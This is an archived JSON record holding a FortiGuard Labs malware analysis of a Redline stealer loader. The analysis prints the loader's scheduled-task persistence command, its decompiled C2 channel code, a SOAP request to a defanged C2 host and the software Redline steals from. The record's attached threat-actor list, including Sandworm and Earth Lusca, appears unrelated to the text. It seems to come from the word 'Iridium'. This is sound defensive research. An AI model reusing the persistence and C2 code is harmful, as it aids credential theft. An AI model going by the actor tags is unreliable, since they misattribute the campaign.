{
	"id": "59a81de8-4425-4152-b443-b9c4a1872c47",
	"created_at": "2026-04-06T00:13:12.945947Z",
	"updated_at": "2026-04-10T03:37:09.411614Z",
	"deleted_at": null,
	"sha1_hash": "6192bb43b28d2e57745784ce3010183ce50aea27",
	"title": "Excel Document Delivers Multiple Malware by Exploiting CVE-2017-11882 – Part II | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1276934,
	"plain_text": "Excel Document Delivers Multiple Malware by Exploiting CVE-2017-11882 – Part II | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-10-05 · Archived: 2026-04-05 21:27:23 UTC\r\nFortiGuard Labs recently captured an Excel document with an embedded malicious file in the wild. The\r\nembedded file, with a randomized file name, exploits a particular vulnerability—CVE-2017-11882—to execute\r\nmalicious code that delivers and executes malware on a victim’s device.\r\nPart I of my analysis explained how this crafted Excel document exploits CVE-2017-11882 and what it does when\r\nexploiting that vulnerability. An involved website (hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/{file name}) was\r\nfound storing and delivering numerous malware family samples, such as Formbook and Redline. I dissected a recent\r\nFormbook sample from that website in part I of my analysis, including but not limited to how that Formbook was\r\ndownloaded and deployed on a victim’s device and what C2 servers that Formbook variant contains.\r\nRedline (also known as Redline Stealer) is a commercial malware family designed to collect sensitive information\r\nfrom infected devices, such as saved credentials, autocomplete data, credit card information, and more.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Collect Sensitive Information from Victim’s Device.\r\nSeverity level: Critical\r\nI start part II of my analysis by examining a Redline sample collected from that same website. In this report, you\r\nwill learn how the Redline payload is extracted from the sample, how it maintains persistence on the infected\r\ndevice, what sorts of sensitive information are stolen from the victim’s device, and how that stolen information is\r\nsubmitted to its C2 server.\r\nRedline Loader\r\nThe Redline sample I selected is “hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe”, which is a Redline\r\nloader. 
It is obfuscated by a .NET Obfuscator called SmartAssembly 6.9.0.114. When I analyzed this sample using\r\na .Net debugger, I found that it has a comprehensive set of obfuscation features, such as obfuscated names (class\r\nnames, function names, variable names, and more), control flow obfuscation, string encoding, and declarative\r\nobfuscation.\r\nFigure 1.1 shows the sample in a debugger with obfuscated names and the entry point function (main() function)\r\nshown using SmartAssembly.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 1 of 15\n\nFigure 1.1 – Redline sample with full obfuscation protection\r\nIt can be deobfuscated using the de4dot tool to get a friendlier, clean version, as shown in Figure 1.2.\r\nFigure 1.2 – Deobfuscated Redline sample\r\nAfter sleeping for five seconds at the start of the Redline sample (Redline loader), it loads a data block from its\r\n.Net resource called “brfmdFiaha”. This is then decrypted into a PE file with the key string “brfmdFiaha”, as\r\nshown in Figure 1.3, where a local variable “byte_” is pointing to the decrypted PE file shown in the memory\r\nsubtab.\r\nFigure 1.3 – Extracting and decrypting a PE file\r\nThe decrypted PE file is the payload file of this Redline variant. 
It then process-hollows the decrypted PE file.\r\nIt dynamically loads a group of Windows APIs to process-hollow the Redline payload file, which are listed in the\r\ntable below.\r\ndelegate0_0.Method {Boolean Wow64GetThreadContext(IntPtr, Int32[])}\r\ndelegate1_0.Method {Boolean GetThreadContext(IntPtr, Int32[])}\r\ndelegate2_0.Method {Boolean ReadProcessMemory(IntPtr, Int32, Int32, Int32, Int32 ByRef)}\r\ndelegate3_0.Method {Int32 VirtualAllocEx(IntPtr, IntPtr, UInt32, UInt32, UInt32)}\r\ndelegate4_0.Method {Boolean WriteProcessMemory(IntPtr, Int32, Byte[], Int32, Int32 ByRef)}\r\ndelegate5_0.Method {Boolean Wow64SetThreadContext(IntPtr, Int32[])}\r\ndelegate6_0.Method {Boolean SetThreadContext(IntPtr, Int32[])}\r\ndelegate7_0.Method {UInt32 ResumeThread(IntPtr)}\r\ndelegate8_0.Method {Boolean CreateProcessAsUser(IntPtr, System.String, System.String, IntPtr, IntPtr, Boolean, UInt32, IntPtr, System.String, Struct1 ByRef, Struct0 ByRef)}\r\nSystem.Reflection.MethodInfo {System.Reflection.RuntimeMethodInfo}\r\nIt calls the API CreateProcessAsUser() with a CreateFlag of CREATE_SUSPENDED (0x4) to create a suspended\r\nduplicate process of the Redline loader. It then calls VirtualAllocEx() to allocate memory space in the suspended\r\nprocess and copies the entire Redline payload file from the Redline loader into it by calling the\r\nWriteProcessMemory() API. Next, it deploys the copied payload file in the newly created process, calling the APIs\r\nWow64GetThreadContext() or GetThreadContext(), ReadProcessMemory(), WriteProcessMemory(), and\r\nWow64SetThreadContext() or SetThreadContext(). 
Before exiting the Redline loader process, it calls the API\r\nResumeThread() to have the suspended process resume running from the copied Redline payload.\r\nRedline Persistence Mechanism\r\nThe Redline loader is also in charge of maintaining Redline persistence on the victim’s device. Unlike Formbook,\r\nwhich is added to the auto-run group in the system registry, Redline uses the system Task Scheduler.\r\nThe Redline loader calls the following command-line command.\r\n\"cmd.exe\" /C schtasks /create /sc minute /mo 1 /tn \"Nafdfnasia\" /tr \"'C:\\Users\\{user\r\nname}\\AppData\\Roaming\\packtracer.exe'\" /f\r\nIt executes “schtasks.exe” with parameters to create a new task named “Nafdfnasia”, which is\r\ntriggered by the Task Scheduler every minute to execute a file called “packtracer.exe”. Figure 2.1 is a screenshot\r\nof this added Redline task.\r\nFigure 2.1 – Details of the Redline task being added to the Task Scheduler\r\nSome may wonder what this “packtracer.exe” file is. After executing the above command-line command, the loader\r\nruns a DOS “copy” command to duplicate itself to the file\r\n“%AppData%/packtracer.exe”, a path that is a hardcoded constant string in the Redline loader.\r\nOnce that is done, the Redline loader that extracts and runs the Redline payload will be executed by the Windows\r\nTask Scheduler every minute.\r\nDiving into the Redline Payload File\r\nI dumped the Redline payload file from memory for deeper analysis. It’s a .Net framework-based program without\r\nany obfuscation. By going through its code, I determined that the communication between Redline and its C2\r\nserver was built on the WCF (Windows Communication Foundation) service. 
It builds a channel between\r\nthe client and server, with the data transferred on that channel sealed inside the XML-SOAP (Simple Object\r\nAccess Protocol) protocol by the class ChannelFactory.\r\nThe following is a code segment that creates such a channel.\r\nChannelFactory\u003cIRemoteEndpoint\u003e channelFactory = new ChannelFactory\u003cIRemoteEndpoint\u003e\r\n(\r\n    SystemInfoHelper.CreateBind(), \r\n    new EndpointAddress(\"http://\" + address + \"/\")\r\n);\r\nthis.serviceInterfacce = channelFactory.CreateChannel();\r\nWhere:\r\nThe IRemoteEndpoint used to create the channel factory object is an interface implemented in the C2 server\r\nprogram.\r\nThe first parameter, returned by “CreateBind()”, specifies that Redline uses HTTP as the transport for\r\nsending SOAP 1.1 messages.\r\nThe second parameter is an EndpointAddress object built from the C2 server’s\r\ninformation. The “address” is the C2 server address defined in a class (see Figure 3.1).\r\nBy calling the method “channelFactory.CreateChannel()”, it creates a channel (a TCP connection)\r\nbetween Redline and the C2 server. Redline can then remotely call the IRemoteEndpoint methods implemented inside\r\nthe C2 server program and obtain their return values, if applicable.\r\nFigure 3.1 – The definition of the C2 server and the Redline release ID\r\nBelow is the definition of the IRemoteEndpoint interface and the methods Redline uses to call and communicate\r\nwith its C2 server. The “OperationContract” and “ServiceContract” attributes show they use the WCF service\r\nframework. 
Once the methods are called, their method names are replaced in the XML-SOAP data with the name\r\nspecified in the “OperationContract” attribute.\r\n[ServiceContract(Name = \"Endpoint\")]\r\npublic interface IRemoteEndpoint\r\n{\r\n    [OperationContract(Name = \"CheckConnect\")]\r\n    bool CheckConnect();\r\n    [OperationContract(Name = \"EnvironmentSettings\")]\r\n    ScanningArgs GetArguments();\r\n    [OperationContract(Name = \"SetEnvironment\")]\r\n    void VerifyScanRequest(ScanResult user);\r\n    [OperationContract(Name = \"GetUpdates\")]\r\n    IList\u003cUpdateTask\u003e GetUpdates(ScanResult user);\r\n    [OperationContract(Name = \"VerifyUpdate\")]\r\n    void VerifyUpdate(ScanResult user, int updateId);\r\n}\r\nCheckConnect() checks whether the connection status is OK. GetArguments() asks the C2 server which sensitive\r\ndata it needs to steal from the victim’s device. VerifyScanRequest() is responsible for submitting the stolen\r\ninformation to its C2 server. GetUpdates() sends updated stolen information to the C2 server and asks for additional\r\ntasks from the C2 server. VerifyUpdate() is used to inform the C2 server that a task requested by calling\r\nGetUpdates() has been completed.\r\nLet’s check out a real instance of calling these methods. Imagine that Redline calls “result =\r\nthis.serviceInterfacce.CheckConnect();”.\r\nThe request packet is shown below. 
Its body is sealed in SOAP:\r\nPOST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\nSOAPAction: \"http://tempuri.org/Endpoint/CheckConnect\"\r\nHost: sinmac[.]duckdns[.]org:2667\r\nContent-Length: 137\r\nExpect: 100-continue\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\nThis is the response packet:\nHTTP/1.1 200 OK\nContent-Length: 212\nContent-Type: text/xml; charset=utf-8\nServer: Microsoft-HTTPAPI/2.0\nDate: Tue, 20 Sep 2022 18:45:28 GMT\ntrue\nFrom the body portion of the packet, the return value of the method implemented in the C2 server is “true”, which\nis carried within the XML tag “”.\nAll packets between Redline and its C2 server are transferred in the same way and through that created\nchannel.\nStealing Sensitive Information\nLet’s proceed to checking how Redline steals sensitive information from a victim’s infected device. Redline\ncalls the remote method “GetArguments()” to obtain the tasks its C2 server wants it to perform. 
This includes\nswitch flags for whether or not to steal data from targeted software and the web browser folder paths\nwhere the victim’s personal data is stored.\nFigure 4.1 – Values returned from a remote method GetArguments()\r\nFigure 4.1 is a debugger screenshot that includes the values of the variable “settings” obtained from the XML SOAP\r\ndata returned by the C2 server when the GetArguments() method was called.\r\nRedline has 22 local methods for stealing sensitive information from a victim’s device based on the switch\r\nflags and file path information that the “settings” variable carries.\r\nBased on research, Redline can collect information from the following:\r\nWeb Browsers:\r\nChrome, Edge, Firefox, Opera, Waterfox, K-Meleon, IceDragon, Cyberfox, BlackHaw, Pale Moon, Iridium, 7Star,\r\nChromePlus, CentBrowser, Vivaldi, Chedot, Kometa, Elements Browser, Epic Privacy Browser, Sleipnir, Citrio,\r\nCoowon, liebao, QIP Surf, Dragon, Amigo, Torch, Yandex, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik,\r\nNichrome, CocCoc, Chromodo, Brave-Browser, CryptoTab Browser, and all other browsers built on the Chromium\r\nproject.\r\nEmail Clients:\r\nMail.Ru and Thunderbird.\r\nSocial, Game, IM Clients:\r\nBattle.net, Steam, Discord, and Telegram.\r\nFTP and VPN Clients:\r\nUran, ProtonVPN, FileZilla, OpenVPN, and NordVPN.\r\nDigital Wallet:\r\nArmory Wallet, YoroiWallet Wallet, Coinomi Wallet, Electrum Wallet, Ethereum, Exodus, JaxxxLiberty Wallet,\r\nTronLink, Nifty Wallet, MetaMask, MathWallet, Coinbase, BinanceChain, BraveWallet, GuardaWallet,\r\nEqualWallet, JaxxxLiberty, BitAppWallet, iWallet, Wombat, AtomicWallet, MewCx, GuildWallet, 
SaturnWallet,\r\nRoninWallet, and more.\r\nRedline can steal victims' personal information, including saved credentials, auto-fills, credit card information,\r\ntokens, private keys, cookies, profiles, logs, and more, from the default software clients listed above. It also\r\nobtains all files from the victim’s Desktop and Documents folders whose filename contains “txt”, “doc”,\r\n“key”, “wallet”, or “seed”.\r\nBesides collecting sensitive information, it also takes a screenshot of the victim’s screen and collects the basic system\r\nand hardware information of the infected device, including OS version, processor information, graphics card\r\ninformation, monitor information, total RAM, public IP address, location, UserName, default language,\r\nTimeZone, installed programs, installed AntiVirus, AntiSpyWare and Firewalls, and a list of active processes.\r\nFigure 4.2 – View of a request packet with stolen data\r\nThis is a view of the packet with the stolen data in SOAP being submitted to its C2 server. It is sent once Redline\r\ncalls the remote method “this.serviceInterfacce.VerifyScanRequest(result);”, where the parameter “result” holds\r\nall the stolen data listed above from the victim’s device. As per the method definition of VerifyScanRequest(), it is\r\ngiven another name—\"SetEnvironment\"—in WCF. Hence, it uses \"SetEnvironment\" in the packet, as shown\r\nin Figure 4.2.\r\nThe Redline C2 Server Side Tool\r\nFor research purposes, I managed to obtain one C2 server program. 
Whenever the Redline C2 server receives\r\nstolen information from an infected system, it shows one item on its Logs subtab, and the attacker can view the\r\nstolen data through its menu, as shown in Figure 5.1.\r\nFigure 5.1 – C2 server program interface\r\nIt uses an HWID to identify each victim, which is an MD5 hash of the victim’s DomainName, UserName,\r\nand the disk drive’s serial number.\r\nFigure 5.2 is a screenshot of the Redline settings subtab showing the major features: the attacker\r\ncan enable or disable features and add or remove files, paths, and filters to be scanned on the victim’s device.\r\nFigure 5.2 – Features that Redline provides\r\nOnce “System Info” in the context menu is clicked, a pop-up window displays stolen system information on the\r\nright and screenshots on the left (Figure 5.3).\r\nFigure 5.3 – System Info\r\nFigure 5.4 shows the credentials of the FTP clients that Redline stole from my test machine.\r\nFigure 5.4 – FTP clients' credentials\r\nFigure 5.5 – Statistics subtab\r\nThe server-side tool also provides a statistics feature to summarize the information received from its victims.\r\nFortinet Protections\r\nFortinet customers are already protected from this Redline variant with FortiGuard’s Web Filtering, IPS, and\r\nAntiVirus services as follows:\r\nThe downloading URL and C2 server are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded file inside the 
original\r\nExcel document.\r\nFortiGuard Labs detects this Redline variant with the AV signature “MSIL/Redline.8B8C!tr”.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The Fortinet\r\nAntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nFortiGuard Labs provides the IPS signature \"RedLine.Stealer.Botnet\" against Redline's traffic.\r\nFortinet’s Digital Risk Protection Service, FortiRecon, continually monitors for credentials stolen using stealers\r\n(such as Redline) being sold by threat actors on the dark web that can be used to breach a network. Request a test\r\ndrive to see how FortiRecon can provide an early warning of imminent threats to your network and data.\r\nBelow is a screenshot of FortiRecon showing information stolen by Redline being sold on the dark web;\r\nFortiRecon customers received an early warning of the threat.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, which\r\nhas a module on Internet threats designed to help end users learn how to identify and protect themselves from\r\nphishing attacks.\r\nIOCs:\r\nURLs:\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe\r\nRedline C2 Server:\r\n“sinmac[.]duckdns[.]org:2267”\r\nSample SHA-256\r\n[GAT412-IFF22.xlsx]\r\nD1EA94C241E00E8E59A7212F30A9117393F9E883D2B509E566505BC337C473E3\r\n[Redline, almac.exe]\r\n9D621005649A185E07D44EC7906530B8269DF0A84587DEB3AAC8707C5DD88B8C\r\nLearn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s\r\nFortiGuard AI-powered Security Services portfolio. 
Sign up to receive our threat research blogs.\r\nSource: https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two"
	],
	"report_names": [
		"excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434392,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.pdf",
		"text": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.txt",
		"img": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.jpg"
	}
}